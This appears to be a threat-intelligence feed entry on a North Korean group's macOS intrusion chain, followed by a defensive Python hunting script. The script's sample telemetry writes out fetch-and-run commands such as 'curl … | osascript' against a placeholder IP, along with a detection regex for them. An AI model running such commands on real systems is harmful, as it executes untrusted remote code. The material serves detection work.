
Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise

ID: f62bf742-72a9-5ea4-bd93-8f3cfe5f0497

STIX ID: report--f62bf742-72a9-5ea4-bd93-8f3cfe5f0497

Feed Name: Microsoft Security

Threat Score
90/100

Date Published: 2026-04-16

Date Updated: 2026-04-28

Author: Microsoft Threat Intelligence and Microsoft Defender Security Research Team

...
...

Microsoft Threat Intelligence documents a macOS-focused intrusion campaign by the North Korean APT Sapphire Sleet. The intrusion begins with social engineering (malicious compiled AppleScript lures) and proceeds through cascading curl→osascript chains to deploy multiple backdoors and a credential harvester. The actor bypasses macOS protections (TCC and Gatekeeper), establishes persistence via launch daemons, loads payloads reflectively in memory, and exfiltrates wallets, keychains, browser data, Telegram sessions and other sensitive artifacts. The report provides detailed IOCs, hunting queries, and mitigation guidance.
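The two behaviours that the summary singles out, osascript stages fed from curl and a launch daemon plist dropped by that chain, are easy to hunt for in process-tree telemetry. The following is an added example written for this page, not one of the hunting queries from the Microsoft report: it walks a constructed set of EDR-style process and file events (hypothetical field names `pid`, `ppid`, `proc`, `cmd`, `path`, and a placeholder IP from the documentation range) and flags every osascript process that has a `curl ... | osascript` stage in its ancestry, scoring cascading chains by depth, then flags LaunchDaemons plist writes made by a tainted chain or by a writer outside an allowlist.

```python
import re

# Constructed sample telemetry (hypothetical EDR-style process and file events).
# Paths, hostnames and plist names are invented; they are not IOCs from the report.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1, "ppid": 0, "proc": "launchd", "cmd": "/sbin/launchd"},
    {"type": "process", "pid": 300, "ppid": 1, "proc": "Finder",
     "cmd": "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder"},
    # Lure: user opens a compiled AppleScript received via social engineering.
    {"type": "process", "pid": 512, "ppid": 300, "proc": "osascript",
     "cmd": "/usr/bin/osascript /Users/dev/Downloads/Meeting_Invite.scpt"},
    # Stage 1 fetches the next stage and pipes it straight into osascript.
    {"type": "process", "pid": 530, "ppid": 512, "proc": "sh",
     "cmd": "sh -c 'curl -fsSL http://203.0.113.10/stage2.txt | osascript'"},
    {"type": "process", "pid": 531, "ppid": 530, "proc": "curl",
     "cmd": "curl -fsSL http://203.0.113.10/stage2.txt"},
    {"type": "process", "pid": 532, "ppid": 530, "proc": "osascript", "cmd": "osascript"},
    # Stage 2 repeats the pattern: a cascading curl -> osascript chain.
    {"type": "process", "pid": 540, "ppid": 532, "proc": "sh",
     "cmd": "sh -c 'curl -s http://203.0.113.10/stage3 | osascript -'"},
    {"type": "process", "pid": 541, "ppid": 540, "proc": "osascript", "cmd": "osascript -"},
    # Persistence: the chain drops a launch daemon plist.
    {"type": "file", "pid": 541, "op": "create",
     "path": "/Library/LaunchDaemons/com.example.updater.plist"},
    # Benign noise: a package installer writes its own daemon plist,
    # and a developer runs osascript by hand.
    {"type": "process", "pid": 600, "ppid": 1, "proc": "installer",
     "cmd": "/usr/sbin/installer -pkg /tmp/tool.pkg -target /"},
    {"type": "file", "pid": 600, "op": "create",
     "path": "/Library/LaunchDaemons/com.vendor.agent.plist"},
    {"type": "process", "pid": 700, "ppid": 300, "proc": "osascript",
     "cmd": "osascript -e 'display dialog \"hi\"'"},
]

# A curl invocation whose stdout is piped into osascript, anywhere in a command line.
CURL_PIPE_OSASCRIPT = re.compile(r"\bcurl\b[^|]*\|\s*(?:/usr/bin/)?osascript\b")


def build_index(events):
    """Map pid -> process event so the ancestry of any pid can be walked."""
    return {e["pid"]: e for e in events if e["type"] == "process"}


def ancestry(index, pid):
    """Yield the process with this pid and then its ancestors, nearest first.
    The seen-set guards against malformed telemetry with ppid cycles."""
    seen = set()
    while pid in index and pid not in seen:
        seen.add(pid)
        yield index[pid]
        pid = index[pid]["ppid"]


def curl_osascript_chains(events):
    """Return {pid: depth} for every osascript process that has at least one
    'curl ... | osascript' stage in its ancestry. depth is the number of such
    stages above it, so later stages of a cascading chain score higher."""
    index = build_index(events)
    hits = {}
    for e in events:
        if e["type"] != "process" or e["proc"] != "osascript":
            continue
        depth = sum(1 for a in ancestry(index, e["pid"])
                    if CURL_PIPE_OSASCRIPT.search(a["cmd"]))
        if depth:
            hits[e["pid"]] = depth
    return hits


def launch_daemon_writes(events, allow_procs=("installer",)):
    """Return (pid, path, reason) for plist writes under /Library/LaunchDaemons/.
    A write is reported when the writer descends from a flagged curl->osascript
    chain ("chain"), or when the writing process is not on the allowlist
    ("untrusted-writer"). The allowlist is a hypothetical local policy."""
    index = build_index(events)
    chains = curl_osascript_chains(events)
    findings = []
    for e in events:
        if e["type"] != "file":
            continue
        if not (e["path"].startswith("/Library/LaunchDaemons/") and e["path"].endswith(".plist")):
            continue
        writer = index.get(e["pid"], {}).get("proc", "?")
        tainted = any(a["pid"] in chains for a in ancestry(index, e["pid"]))
        if tainted:
            findings.append((e["pid"], e["path"], "chain"))
        elif writer not in allow_procs:
            findings.append((e["pid"], e["path"], "untrusted-writer"))
    return findings


if __name__ == "__main__":
    for pid, depth in sorted(curl_osascript_chains(SAMPLE_EVENTS).items()):
        print(f"osascript pid {pid}: {depth} curl|osascript stage(s) in ancestry")
    for pid, path, reason in launch_daemon_writes(SAMPLE_EVENTS):
        print(f"LaunchDaemons write by pid {pid}: {path} ({reason})")
```

The ancestry walk matters more than the regex: the final osascript in a cascading chain is launched with an empty or `-` command line, so a rule that inspects only the child's own arguments never sees the curl. Scoring by depth also separates a one-off `curl | osascript` from the multi-stage pattern the report describes, and tying the persistence rule to the tainted chain lets the plist write fire even when the writing process would otherwise look like routine administration.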
